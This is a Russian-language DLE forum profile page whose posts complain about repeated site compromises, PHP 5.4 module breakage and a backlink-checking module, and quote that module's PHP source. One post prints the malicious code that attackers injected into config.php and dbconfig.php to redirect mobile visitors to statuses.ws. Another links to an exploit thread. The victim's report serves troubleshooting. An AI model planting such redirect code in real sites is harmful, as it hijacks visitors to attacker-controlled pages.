![](https://forum.dle-news.ru/uploads/set_resources_1/84c1e40ea0e759e3f1505eb1788ddf3c_pattern.png)
![](https://forum.dle-news.ru/uploads/set_resources_1/84c1e40ea0e759e3f1505eb1788ddf3c_default_photo.png)
dampel
-
Публикации
37 -
Зарегистрирован
-
Посещение
Сообщения, опубликованные пользователем dampel
-
-
Если у вас руки из Жо..ы растут, то да, будете. За ваш сайт отвечаете только вы. если вы установили все патчи безопасности и у вас ломают сайт, то вывод логичен, дырка у вас в доступах или серверном по. Но думать головой стало не модно, я смотрю. ставьте нормальные пароли на доступы фтп, бд, защищайте свой сайт, это только ваш сайт и ничей большеТак я и не понял, разработчик таблетку придумал или так и будем каждый день руками чистить?Вы хотите сказать что у всех кто здесь проблемы в серверном ПО или паролями ftp ?
В ДЛЕ есть дыра и это факт
И не надо никого оскорблять на форуме.
Кстати вот ещё одну дыру просекли
http://forum.antichat.ru/showpost.php?p=3396992&postcount=259
-
Да, все остальное выводит. На php 5.3 все работало
-
Да nginx есть и dle 9.7
На php 5.4 перестало работать местоположение пользователя (кто что делает на сайте)
Это касается всех существующих модулей онлайна.
На 5.3 все работало нормально.
Возможно разработчики php что то изменили в новой версии.
-
Что скажет celsoft ? проблемы только на DLE сайтах, везде только об этом и пишут, где это самая дырочка или дыры ?
Если после установки последнего патча не было взломов, в чем тогда вопрос?
Патчи бесполезны, они не помогают
-
Тема уже есть
http://forum.dle-news.ru/index.php?showtopic=62025&st=0
-
Это только временное решение. Нужно искать источник.
Как я понял это мобильный злокод. То есть при просмотре сайта с мобильных устройств загружается какая то хрень.
-
Не помогают вышеописанные действия.
Заливают каждые 3 дня. Сегодня 12 число и снова залили только что. Все патчи применены.
Пароли меняли уже к чему только можно.
В engine/data/config.php
$iphone = strpos($_SERVER['HTTP_USER_AGENT'],"iPhone"); $android = strpos($_SERVER['HTTP_USER_AGENT'],"Android"); $palmpre = strpos($_SERVER['HTTP_USER_AGENT'],"webOS"); $berry = strpos($_SERVER['HTTP_USER_AGENT'],"BlackBerry"); $ipod = strpos($_SERVER['HTTP_USER_AGENT'],"iPod"); if ($iphone || $android || $palmpre || $ipod || $berry === true) { header('Location: http://statuses.ws/'); }
тот же код и в dbconfig.php
-
Тоже самое произошло
А у кого на каких версиях занесли?
-
На PHP 5.4 у всех модулей онлайн перестало отображать местоположение пользователя.
-
Смотрите аксесс логи сайта.
К примеру на 15:11 если залили в это время.
-
Здравствуйте установил модуль DLE "Партнеры сайта" Версия 1.0
При проверке обратной ссылки пишет что её нет.
Проверка работает в том случае если на сайте-партнере стоит прямая ссылка на сайт без модификаций вида :
http://www.site.ru/go.php?http://example.ru
и т.п Ещё хочу дополнить: Что проверка даже прямой ссылки работает только если она находится строго между тегами<body></body>[/code] Не проверяется если тег <body> изменен. К примеру
[code]<body bgcolor="#1a1a1a" leftmargin="0" topmargin="0" marginwidth="0" marginheight="0">[/code]Вот как я понимаю код модуля для проверки ссылок[code] function CheckPartner($email,$site_url,$site_name,$site_descr){ global $partners_lang; $err=""; if ((preg_match("/[^(\w)|(\@)|(\.)|(\-)]/",$email)) || (strlen($site_name)<8)) {$err.=$partners_lang['email_err']."<br>";} if ((stripos($site_url,"http://")===false) ||(strlen($site_url)<12)||(strlen($site_url)>255)) {$err.=$partners_lang['url_err']."<br>";} if ((strlen($site_name)>255) || (strlen($site_name)<5)) {$err.=$partners_lang['name_err']."<br>";} if ((strlen($site_descr) > 255)||(strlen($site_descr) <5)) {$err.=$partners_lang['desc_err']."<br>";} if($err!=""){return $err;}else{return false;} } function CheckPresent($my_url,$content){ preg_match("/<body>(.*)<\/body>/is", $content, $out); $content = $out[0]; $pattern = '/<a.*'.preg_quote($my_url,'/').'.*<\/a>/i'; //echo '<textarea style="width:500px;" rows=5>'.$content.'</textarea>'; if (!preg_match($pattern, $content)){ return false; }else return true; } function Checknoind($my_url,$content){ preg_match_all("#<noindex>(.*?)<\/noindex>#is", $content, $out); for ($i=0; $i< count($out[0]); $i++) { if(stripos($out[0][$i],$my_url)!==false){return false;} } return true; } function Checknofoll($my_url,$content){ $pattern = '/<a.*'.preg_quote($my_url,'/').'.*<\/a>/i'; preg_match($pattern, $content, $out); if(stripos($out[0],"nofollow")!==false){return false;}else{return true;} } function Checkrobots($remote_url){ $robotsTxt = new Xbb_RobotsTxt($remote_url); if ( $robotsTxt->allow($remote_url, 'Yandex') ) { return true; } else { return false; } } function Checkcomm($my_url,$content){ preg_match_all("#<!--(.*?)-->#is", $content, $out); for ($i=0; $i< count($out[0]); $i++) { if(stripos($out[0][$i],$my_url)!==false){return false;} } return true; } function CheckBackLink($my_url,$remote_url){ global $partners_lang; $remote_url = parse_url($remote_url); $remote_url = "http://".$remote_url['host']."/"; $err=""; $content = file_get_contents($remote_url); if($content==""){return $partners_lang['open_site_err']." <b>".$remote_url."</b>";} if(!CheckPresent($my_url,$content)){return $partners_lang['backlink_err']." <b>".$remote_url."</b>";} if(!Checknoind($my_url,$content)){$err.=$partners_lang['back_noind_err']."<br>";} if(!Checknofoll($my_url,$content)){$err.=$partners_lang['back_nofoll_err']."<br>";} if(!Checkcomm($my_url,$content)){$err.=$partners_lang['back_comm_err']."<br>";} if(!Checkrobots($remote_url)){$err.=$partners_lang['back_rob_err']."<br>";} if($err==""){return false;}else{return $err;} } function CheckDubl($url){ global $db, $partners_lang; $url = str_replace("http://www.","http://",$url); $url = parse_url($url); $sql_result = $db->query("SELECT site_url FROM ".PREFIX."_partners WHERE site_url LIKE '%".$url['host']."%'"); $row = $db->get_row( $sql_result ); $row['site_url'] = str_replace("http://www.","http://",$row['site_url']); $row = parse_url($row['site_url']); if(stripos($url['host'],$row['host'])===false){return false;}else{return $partners_lang['dubl_err'];} } [/code]файл inc/include/partners.func.php Подскажите пожалуйста что в нем изменить чтобы проверял не только прямые ссылки, но и модифицированные. И без тегов <body>
Подскажите есть ли решение? Версия dle 9.7
Заливают вредоностный код
в Прием багов
Опубликовано:
Толку от этих патчей, если они не помогают